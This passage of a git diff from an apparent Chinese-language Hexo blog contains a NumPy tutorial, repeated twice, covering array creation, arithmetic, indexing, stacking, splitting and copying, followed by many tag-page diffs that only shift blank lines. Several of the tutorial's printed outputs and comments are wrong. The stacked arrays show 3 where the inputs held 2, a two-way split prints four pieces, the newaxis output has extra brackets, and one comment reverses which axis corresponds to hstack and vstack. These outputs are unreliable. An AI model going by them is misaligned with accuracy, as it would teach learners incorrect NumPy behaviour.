    array([ 3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14])

    遍历 A 的各个元素

    for item in A.flat:
    print(item, end=",")
    3,4,5,6,7,8,9,10,11,12,13,14,

    2.6 numpy array 合并

    import numpy as np

    A = np.array([1, 1, 1])
    B = np.array([2, 2, 2])

    A 和 B 向下合并(vertical stack)

    C = np.vstack((A, B))
    print(C)
    print(A.shape, C.shape)
    [[1 1 1] [2 2 3]](3,) (2, 3)

    A 和 B 左右合并(horizontal stack)

    C = np.hstack((A, B))
    print(C)
    print(A.shape, C.shape)
    [1 1 1 2 2 3](3,) (6,)

    将 A 从横向数列转换为竖向数列

    A[:, np.newaxis]
    array([[[1]],       [[1]],       [[1]]])

    将 A 和 B 纵向合并

    A = np.array([1, 1, 1])[:, np.newaxis]
    B = np.array([2, 2, 2])[:, np.newaxis]
    np.vstack((A, B))
    array([[1],       [1],       [1],       [2],       [2],       [2]])
    np.hstack((A, B))
    array([[1, 2],       [1, 2],       [1, 2]])

    设定数组在哪一个维度进行合并

    np.concatenate((A, B, B, A), axis=1) # axis=0 相当于 hstack,axis=1 相当于 vstack
    array([[1, 2, 2, 1],       [1, 2, 2, 1],       [1, 2, 2, 1]])

    2.7 numpy array 分割

    import numpy as np

    A = np.arange(12).reshape((3, 4))
    print(A)
    [[ 0  1  2  3] [ 4  5  6  7] [ 8  9 10 11]]

    等量分割 A,np.split(数组, 个数,维度)

    np.split(A, 2, axis=1)
    [array([[0],        [4],        [8]]), array([[1],        [5],        [9]]), array([[ 2],        [ 6],        [10]]), array([[ 3],        [ 7],        [11]])]
    np.split(A, 3, axis=0)
    [array([[0, 1, 2, 3]]), array([[4, 5, 6, 7]]), array([[ 8,  9, 10, 11]])]
    np.vsplit(A, 3)
    [array([[0, 1, 2, 3]]), array([[4, 5, 6, 7]]), array([[ 8,  9, 10, 11]])]
    np.hsplit(A, 2)
    [array([[0, 1],        [4, 5],        [8, 9]]), array([[ 2,  3],        [ 6,  7],        [10, 11]])]

    不等量分割 A,np.array_split()

    np.array_split(A, 3, axis=1)
    [array([[0, 1],        [4, 5],        [8, 9]]), array([[ 2],        [ 6],        [10]]), array([[ 3],        [ 7],        [11]])]

    2.8 numpy 的 copy & deep copy

    import numpy as np
    A = np.arange(4)
    print(A)
    [0 1 2 3]
    B = A
    C = A
    D = B
    A[0] = 11
    print(A)
    [11  1  2  3]

    判断两个变量是否相同

    B is A
    True
    D is A
    True

    A.copy()

    当 A 的值被改变时,B,C,D 的值也会被改变

    B = A.copy() # deep copy
    B
    array([11,  1,  2,  3])

    此时改变 A 的值,不会改变 B 的值

    A[3] = 44
    A
    array([11,  1,  2, 44])
    B
    array([11,  1,  2,  3])
    ]]>
    + 前言

    正文

    2.1numpy 属性

    导入 numpy 库,并简写为 np

    1
    import numpy as np

    创建一个数组

    1
    2
    array = np.array([[1, 2, 3],
    [2, 3, 4]])

    打印数组

    1
    print(array)
    [[1 2 3] [2 3 4]]

    打印数组的维度

    1
    print(array.ndim)
    2

    打印数组的形状

    1
    print(array.shape)
    (2, 3)

    打印数组的大小

    1
    print(array.size)
    6

    2.2 numpy 的创建 array

    1
    import numpy as np

    定义 array 的 dtype

    1
    a = np.array([2, 23, 4], dtype = np.int64)

    打印数组类型

    1
    print(a.dtype)
    int64

    定义零矩阵

    1
    np.zeros((3, 4))
    array([[0., 0., 0., 0.],       [0., 0., 0., 0.],       [0., 0., 0., 0.]])

    定义全为一的矩阵

    1
    np.ones((3, 4))
    array([[1., 1., 1., 1.],       [1., 1., 1., 1.],       [1., 1., 1., 1.]])

    定义未初始化的矩阵

    如果之前未定义过矩阵,内容为十分接近于 0 的随机数,否则值与上一个定义过的矩阵内容一致

    1
    np.empty((3, 4))
    array([[1., 1., 1., 1.],       [1., 1., 1., 1.],       [1., 1., 1., 1.]])

    定义有序的数列,np.arange(初始值,最终值,步长)

    1
    np.arange(10, 20, 2)
    array([10, 12, 14, 16, 18])

    将一个有序数列转换为矩阵

    1
    np.arange(12).reshape(3, 4)
    array([[ 0,  1,  2,  3],       [ 4,  5,  6,  7],       [ 8,  9, 10, 11]])

    生成线段,np.linspace(初始值,最终值,段数)

    1
    np.linspace(1, 10, 5)
    array([ 1.  ,  3.25,  5.5 ,  7.75, 10.  ])

    生成线段,并把它改为矩阵

    1
    np.linspace(1, 10, 6).reshape((2, 3))
    array([[ 1. ,  2.8,  4.6],       [ 6.4,  8.2, 10. ]])

    2.3 numpy 基础运算

    1
    import numpy as np

    创建两个数组

    1
    2
    3
    4
    a = np.array([10, 20, 30, 40])
    b = np.arange(4)
    print(a)
    print(b)
    [10 20 30 40][0 1 2 3]

    数组相减

    1
    a - b
    array([10, 19, 28, 37])

    数组乘方

    1
    a ** b
    array([    1,    20,   900, 64000], dtype=int32)

    对于 a 的每个值,进行正弦运算

    1
    np.sin(a)
    array([-0.54402111,  0.91294525, -0.98803162,  0.74511316])

    对 b 的每个数进行判断

    1
    b < 3
    array([ True,  True,  True, False])
    1
    b == 3
    array([False, False, False,  True])

    定义二维矩阵

    1
    2
    3
    4
    5
    a = np.array([[1, 1],
    [0, 1]])
    b = b.reshape(2, 2)
    print(a)
    print(b)
    [[1 1] [0 1]][[0 1] [2 3]]

    矩阵逐个相乘

    1
    a * b
    array([[0, 1],       [0, 3]])

    矩阵乘法

    1
    np.dot(a, b)
    array([[2, 4],       [2, 3]])
    1
    a.dot(b)
    array([[2, 4],       [2, 3]])

    创建随机生成矩阵,内容为 0 到 1 的随机数

    1
    2
    a = np.random.random((2, 4))
    print(a)
    [[0.8173095  0.68161518 0.69519572 0.38590121] [0.75305129 0.12209991 0.31815067 0.08084771]]

    矩阵求和

    1
    np.sum(a)
    3.854171189705032

    矩阵最小值

    1
    np.min(a)
    0.08084770650268369

    矩阵在第 1 维度(每一行)的求和

    1
    np.sum(a, axis=1)
    array([2.58002161, 1.27414958])

    矩阵在每一列的求和

    1
    np.sum(a, axis=0)
    array([1.57036079, 0.80371509, 1.01334639, 0.46674891])

    2.4 numpy 基础运算 2

    1
    import numpy as np

    定义一个矩阵

    1
    2
    A = np.arange(2, 14).reshape((3, 4))
    print(A)
    [[ 2  3  4  5] [ 6  7  8  9] [10 11 12 13]]

    查询 A 中最小值的索引

    1
    np.argmin(A)
    0

    查询 A 中最大值的索引

    1
    np.argmax(A)
    11

    计算 A 的平均值

    1
    np.mean(A)
    7.5
    1
    A.mean()
    7.5
    1
    np.average(A)
    7.5

    计算 A 的中位数

    1
    np.median(A)
    7.5

    累加 A

    1
    np.cumsum(A)
    array([ 2,  5,  9, 14, 20, 27, 35, 44, 54, 65, 77, 90], dtype=int32)

    累差 A(后一列减前一列)

    1
    np.diff(A)
    array([[1, 1, 1],       [1, 1, 1],       [1, 1, 1]])

    找出 A 中所有非零的下标(行,列)

    1
    np.nonzero(A)
    (array([0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2], dtype=int64), array([0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3], dtype=int64))

    对 A 进行逐行排序

    1
    2
    A = np.arange(14, 2, -1).reshape((3, 4))
    print(A)
    [[14 13 12 11] [10  9  8  7] [ 6  5  4  3]]
    1
    np.sort(A)
    array([[11, 12, 13, 14],       [ 7,  8,  9, 10],       [ 3,  4,  5,  6]])

    矩阵的转置

    1
    A.T
    array([[14, 10,  6],       [13,  9,  5],       [12,  8,  4],       [11,  7,  3]])
    1
    np.transpose(A)
    array([[14, 10,  6],       [13,  9,  5],       [12,  8,  4],       [11,  7,  3]])

    限制 A 的最小值和最大值

    1
    np.clip(A, 5, 9)
    array([[9, 9, 9, 9],       [9, 9, 8, 7],       [6, 5, 5, 5]])

    对于矩阵 A 逐列求平均值

    1
    np.mean(A, axis=0)
    array([10.,  9.,  8.,  7.])

    2.5 numpy 索引

    1
    2
    3
    4
    import numpy as np

    A = np.arange(3, 15)
    print(A)
    [ 3  4  5  6  7  8  9 10 11 12 13 14]

    查找 A 的第 3 个值

    1
    A[3]
    6
    1
    2
    A = A.reshape((3, 4))
    print(A)
    [[ 3  4  5  6] [ 7  8  9 10] [11 12 13 14]]

    查找 A 的第 2 行

    1
    print(A[2])
    [11 12 13 14]

    查找 A 的第 1 行第 1 列

    1
    A[1][1]
    8
    1
    A[1, 1]
    8

    查找 A 的第一列(用冒号代替所有的数)

    1
    A[:, 1]
    array([ 4,  8, 12])

    查找 A 的第一行,第一列到第三列之间的数

    1
    A[1, 1:3]
    array([8, 9])

    用 for 循环输出 A 的所有行

    1
    2
    for row in A:
    print(row)
    [3 4 5 6][ 7  8  9 10][11 12 13 14]

    输出 A 的所有列

    1
    2
    for col in A.T:
    print(col)
    [ 3  7 11][ 4  8 12][ 5  9 13][ 6 10 14]

    将 A 转换为序列

    1
    A.flatten()
    array([ 3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14])

    遍历 A 的各个元素

    1
    2
    for item in A.flat:
    print(item, end=",")
    3,4,5,6,7,8,9,10,11,12,13,14,

    2.6 numpy array 合并

    1
    2
    3
    4
    import numpy as np

    A = np.array([1, 1, 1])
    B = np.array([2, 2, 2])

    A 和 B 向下合并(vertical stack)

    1
    2
    3
    C = np.vstack((A, B))
    print(C)
    print(A.shape, C.shape)
    [[1 1 1] [2 2 3]](3,) (2, 3)

    A 和 B 左右合并(horizontal stack)

    1
    2
    3
    C = np.hstack((A, B))
    print(C)
    print(A.shape, C.shape)
    [1 1 1 2 2 3](3,) (6,)

    将 A 从横向数列转换为竖向数列

    1
    A[:, np.newaxis]
    array([[[1]],       [[1]],       [[1]]])

    将 A 和 B 纵向合并

    1
    2
    3
    A = np.array([1, 1, 1])[:, np.newaxis]
    B = np.array([2, 2, 2])[:, np.newaxis]
    np.vstack((A, B))
    array([[1],       [1],       [1],       [2],       [2],       [2]])
    1
    np.hstack((A, B))
    array([[1, 2],       [1, 2],       [1, 2]])

    设定数组在哪一个维度进行合并

    1
    np.concatenate((A, B, B, A), axis=1) # axis=0 相当于 hstack,axis=1 相当于 vstack
    array([[1, 2, 2, 1],       [1, 2, 2, 1],       [1, 2, 2, 1]])

    2.7 numpy array 分割

    1
    2
    3
    4
    import numpy as np

    A = np.arange(12).reshape((3, 4))
    print(A)
    [[ 0  1  2  3] [ 4  5  6  7] [ 8  9 10 11]]

    等量分割 A,np.split(数组, 个数,维度)

    1
    np.split(A, 2, axis=1)
    [array([[0],        [4],        [8]]), array([[1],        [5],        [9]]), array([[ 2],        [ 6],        [10]]), array([[ 3],        [ 7],        [11]])]
    1
    np.split(A, 3, axis=0)
    [array([[0, 1, 2, 3]]), array([[4, 5, 6, 7]]), array([[ 8,  9, 10, 11]])]
    1
    np.vsplit(A, 3)
    [array([[0, 1, 2, 3]]), array([[4, 5, 6, 7]]), array([[ 8,  9, 10, 11]])]
    1
    np.hsplit(A, 2)
    [array([[0, 1],        [4, 5],        [8, 9]]), array([[ 2,  3],        [ 6,  7],        [10, 11]])]

    不等量分割 A,np.array_split()

    1
    np.array_split(A, 3, axis=1)
    [array([[0, 1],        [4, 5],        [8, 9]]), array([[ 2],        [ 6],        [10]]), array([[ 3],        [ 7],        [11]])]

    2.8 numpy 的 copy & deep copy

    1
    import numpy as np
    1
    2
    A = np.arange(4)
    print(A)
    [0 1 2 3]
    1
    2
    3
    4
    5
    B = A
    C = A
    D = B
    A[0] = 11
    print(A)
    [11  1  2  3]

    判断两个变量是否相同

    1
    B is A
    True
    1
    D is A
    True

    A.copy()

    当 A 的值被改变时,B,C,D 的值也会被改变

    1
    2
    B = A.copy() # deep copy
    B
    array([11,  1,  2,  3])

    此时改变 A 的值,不会改变 B 的值

    1
    2
    A[3] = 44
    A
    array([11,  1,  2, 44])
    1
    B
    array([11,  1,  2,  3])
    ]]>
    diff --git a/tags/3B1B/index.html b/tags/3B1B/index.html index 6dfde25452..0dad55829d 100644 --- a/tags/3B1B/index.html +++ b/tags/3B1B/index.html @@ -43,8 +43,6 @@ - - @@ -560,6 +558,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/tags/6-16-\345\214\227\344\272\254/index.html" "b/tags/6-16-\345\214\227\344\272\254/index.html" index c02b009dd4..7077e2e5aa 100644 --- "a/tags/6-16-\345\214\227\344\272\254/index.html" +++ "b/tags/6-16-\345\214\227\344\272\254/index.html" @@ -43,8 +43,6 @@ - - @@ -565,6 +563,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/AE/index.html b/tags/AE/index.html index a4c27334e3..5291633b99 100644 --- a/tags/AE/index.html +++ b/tags/AE/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/AI/index.html b/tags/AI/index.html index 5d5e062042..036c3b54d1 100644 --- a/tags/AI/index.html +++ b/tags/AI/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/AIGC/index.html b/tags/AIGC/index.html index 7a0556a667..2f645f1555 100644 --- a/tags/AIGC/index.html +++ b/tags/AIGC/index.html @@ -43,8 +43,6 @@ - - @@ -590,6 +588,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/AN/index.html b/tags/AN/index.html index 104e704eaa..a03177422c 100644 --- a/tags/AN/index.html +++ b/tags/AN/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Adobe/index.html b/tags/Adobe/index.html index f34a8b31d6..5a9b680920 100644 --- a/tags/Adobe/index.html +++ b/tags/Adobe/index.html @@ -43,8 +43,6 @@ - - @@ -610,6 +608,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Blender/index.html b/tags/Blender/index.html index d0abfe02bb..7fb10d9ace 100644 --- a/tags/Blender/index.html +++ b/tags/Blender/index.html @@ -43,8 +43,6 @@ - - @@ -640,6 +638,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Blender/page/2/index.html b/tags/Blender/page/2/index.html index d0abfe02bb..7fb10d9ace 100644 --- a/tags/Blender/page/2/index.html +++ b/tags/Blender/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -640,6 +638,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/C4D/index.html b/tags/C4D/index.html index 89abe9ef77..159ad55ef0 100644 --- a/tags/C4D/index.html +++ b/tags/C4D/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/CET-6/index.html b/tags/CET-6/index.html index 7d5232af9a..becd8a2512 100644 --- a/tags/CET-6/index.html +++ b/tags/CET-6/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/CPP/index.html b/tags/CPP/index.html index 68b1fdbf16..b2c96ae3cb 100644 --- a/tags/CPP/index.html +++ b/tags/CPP/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/CSS/index.html b/tags/CSS/index.html index 4f9fd785c8..05c48982ac 100644 --- a/tags/CSS/index.html +++ b/tags/CSS/index.html @@ -43,8 +43,6 @@ - - @@ -580,6 +578,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/CSharp/index.html b/tags/CSharp/index.html index 566e85aba8..2270c5ecab 100644 --- a/tags/CSharp/index.html +++ b/tags/CSharp/index.html @@ -43,8 +43,6 @@ - - @@ -615,6 +613,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Canvas/index.html b/tags/Canvas/index.html index fe8e3838f6..e5df8cb656 100644 --- a/tags/Canvas/index.html +++ b/tags/Canvas/index.html @@ -43,8 +43,6 @@ - - @@ -595,6 +593,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/DigitalSreeni/index.html b/tags/DigitalSreeni/index.html index d2666cab10..291d069aed 100644 --- a/tags/DigitalSreeni/index.html +++ b/tags/DigitalSreeni/index.html @@ -43,8 +43,6 @@ - - @@ -655,6 +653,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/DigitalSreeni/page/2/index.html b/tags/DigitalSreeni/page/2/index.html index d2666cab10..291d069aed 100644 --- a/tags/DigitalSreeni/page/2/index.html +++ b/tags/DigitalSreeni/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -655,6 +653,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Docker/index.html b/tags/Docker/index.html index e773fa2731..f4ed8e18d7 100644 --- a/tags/Docker/index.html +++ b/tags/Docker/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/EJS/index.html b/tags/EJS/index.html index 52c119d635..e4a4e484ca 100644 --- a/tags/EJS/index.html +++ b/tags/EJS/index.html @@ -43,8 +43,6 @@ - - @@ -580,6 +578,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/GAMES101/index.html b/tags/GAMES101/index.html index 386e8a2425..7dec89883f 100644 --- a/tags/GAMES101/index.html +++ b/tags/GAMES101/index.html @@ -43,8 +43,6 @@ - - @@ -605,6 +603,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/GAMES104/index.html b/tags/GAMES104/index.html index 5ff5846314..3689afa447 100644 --- a/tags/GAMES104/index.html +++ b/tags/GAMES104/index.html @@ -43,8 +43,6 @@ - - @@ -635,6 +633,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/GAMES104/page/2/index.html b/tags/GAMES104/page/2/index.html index 5ff5846314..3689afa447 100644 --- a/tags/GAMES104/page/2/index.html +++ b/tags/GAMES104/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -635,6 +633,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/GenJi/index.html b/tags/GenJi/index.html index cdd20e5584..df9ba3ede3 100644 --- a/tags/GenJi/index.html +++ b/tags/GenJi/index.html @@ -43,8 +43,6 @@ - - @@ -595,6 +593,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Git/index.html b/tags/Git/index.html index 10700392da..903b98617e 100644 --- a/tags/Git/index.html +++ b/tags/Git/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/HTML/index.html b/tags/HTML/index.html index c2807dcbd5..1102e295e4 100644 --- a/tags/HTML/index.html +++ b/tags/HTML/index.html @@ -43,8 +43,6 @@ - - @@ -595,6 +593,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Hexo/index.html b/tags/Hexo/index.html index cac1925e35..c22784b69d 100644 --- a/tags/Hexo/index.html +++ b/tags/Hexo/index.html @@ -43,8 +43,6 @@ - - @@ -705,6 +703,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Hexo/page/2/index.html b/tags/Hexo/page/2/index.html index cac1925e35..c22784b69d 100644 --- a/tags/Hexo/page/2/index.html +++ b/tags/Hexo/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -705,6 +703,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Javascript/index.html b/tags/Javascript/index.html index 04c48856a8..786add8f01 100644 --- a/tags/Javascript/index.html +++ b/tags/Javascript/index.html @@ -43,8 +43,6 @@ - - @@ -685,6 +683,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Javascript/page/2/index.html b/tags/Javascript/page/2/index.html index 04c48856a8..786add8f01 100644 --- a/tags/Javascript/page/2/index.html +++ b/tags/Javascript/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -685,6 +683,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/KurTips/index.html b/tags/KurTips/index.html index 60acd26f08..5431f4b458 100644 --- a/tags/KurTips/index.html +++ b/tags/KurTips/index.html @@ -43,8 +43,6 @@ - - @@ -575,6 +573,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/LR/index.html b/tags/LR/index.html index 7ca323e8a8..5b6ce32f44 100644 --- a/tags/LR/index.html +++ b/tags/LR/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Latex/index.html b/tags/Latex/index.html index 2e6ba641d8..1fd827907e 100644 --- a/tags/Latex/index.html +++ b/tags/Latex/index.html @@ -43,8 +43,6 @@ - - @@ -595,6 +593,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Linux/index.html b/tags/Linux/index.html index 5818dddf73..41fe003fd6 100644 --- a/tags/Linux/index.html +++ b/tags/Linux/index.html @@ -43,8 +43,6 @@ - - @@ -665,6 +663,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/MMOCR/index.html b/tags/MMOCR/index.html index c75352189b..0ac2701b7f 100644 --- a/tags/MMOCR/index.html +++ b/tags/MMOCR/index.html @@ -43,8 +43,6 @@ - - @@ -570,6 +568,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Maya/index.html b/tags/Maya/index.html index ed69ad5f68..6515223548 100644 --- a/tags/Maya/index.html +++ b/tags/Maya/index.html @@ -43,8 +43,6 @@ - - @@ -575,6 +573,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/MindSpore/index.html b/tags/MindSpore/index.html index 3b2690270a..fece69a8a6 100644 --- a/tags/MindSpore/index.html +++ b/tags/MindSpore/index.html @@ -43,8 +43,6 @@ - - @@ -610,6 +608,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/PR/index.html b/tags/PR/index.html index 743462601a..3221d35f48 100644 --- a/tags/PR/index.html +++ b/tags/PR/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/PS/index.html b/tags/PS/index.html index 301f0dd7e7..cfd423b3f9 100644 --- a/tags/PS/index.html +++ b/tags/PS/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Perception/index.html b/tags/Perception/index.html index 16ca3bfcea..a55d01660b 100644 --- a/tags/Perception/index.html +++ b/tags/Perception/index.html @@ -43,8 +43,6 @@ - - @@ -580,6 +578,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/index.html b/tags/Python/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/index.html +++ b/tags/Python/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/10/index.html b/tags/Python/page/10/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/10/index.html +++ b/tags/Python/page/10/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/11/index.html b/tags/Python/page/11/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/11/index.html +++ b/tags/Python/page/11/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/2/index.html b/tags/Python/page/2/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/2/index.html +++ b/tags/Python/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/3/index.html b/tags/Python/page/3/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/3/index.html +++ b/tags/Python/page/3/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/4/index.html b/tags/Python/page/4/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/4/index.html +++ b/tags/Python/page/4/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/5/index.html b/tags/Python/page/5/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/5/index.html +++ b/tags/Python/page/5/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/6/index.html b/tags/Python/page/6/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/6/index.html +++ b/tags/Python/page/6/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/7/index.html b/tags/Python/page/7/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/7/index.html +++ b/tags/Python/page/7/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/8/index.html b/tags/Python/page/8/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/8/index.html +++ b/tags/Python/page/8/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/9/index.html b/tags/Python/page/9/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/9/index.html +++ b/tags/Python/page/9/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Pytorch/index.html b/tags/Pytorch/index.html index 095a0668f0..36437f1c13 100644 --- a/tags/Pytorch/index.html +++ b/tags/Pytorch/index.html @@ -43,8 +43,6 @@ - - @@ -655,6 +653,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Pytorch/page/2/index.html b/tags/Pytorch/page/2/index.html index 095a0668f0..36437f1c13 100644 --- a/tags/Pytorch/page/2/index.html +++ b/tags/Pytorch/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -655,6 +653,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/UE4/index.html b/tags/UE4/index.html index 66b7204959..ba213a5b6b 100644 --- a/tags/UE4/index.html +++ b/tags/UE4/index.html @@ -43,8 +43,6 @@ - - @@ -580,6 +578,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Unity/index.html b/tags/Unity/index.html index e471bb6f4b..17fb33ab65 100644 --- a/tags/Unity/index.html +++ b/tags/Unity/index.html @@ -43,8 +43,6 @@ - - @@ -690,6 +688,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Unity/page/2/index.html b/tags/Unity/page/2/index.html index e471bb6f4b..17fb33ab65 100644 --- a/tags/Unity/page/2/index.html +++ b/tags/Unity/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -690,6 +688,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/UnityPerception/index.html b/tags/UnityPerception/index.html index 1b3c9c55ff..6c09b9763a 100644 --- a/tags/UnityPerception/index.html +++ b/tags/UnityPerception/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Unreal/index.html b/tags/Unreal/index.html index 6786d6cff2..463948ceb5 100644 --- a/tags/Unreal/index.html +++ b/tags/Unreal/index.html @@ -43,8 +43,6 @@ - - @@ -585,6 +583,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Vue/index.html b/tags/Vue/index.html index 7be29b669a..dc416616ff 100644 --- a/tags/Vue/index.html +++ b/tags/Vue/index.html @@ -43,8 +43,6 @@ - - @@ -560,6 +558,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Web/index.html b/tags/Web/index.html index a54c436528..f10f7504bd 100644 --- a/tags/Web/index.html +++ b/tags/Web/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Word/index.html b/tags/Word/index.html index ed029e1971..66bb379d24 100644 --- a/tags/Word/index.html +++ b/tags/Word/index.html @@ -43,8 +43,6 @@ - - @@ -570,6 +568,8 @@

    目录

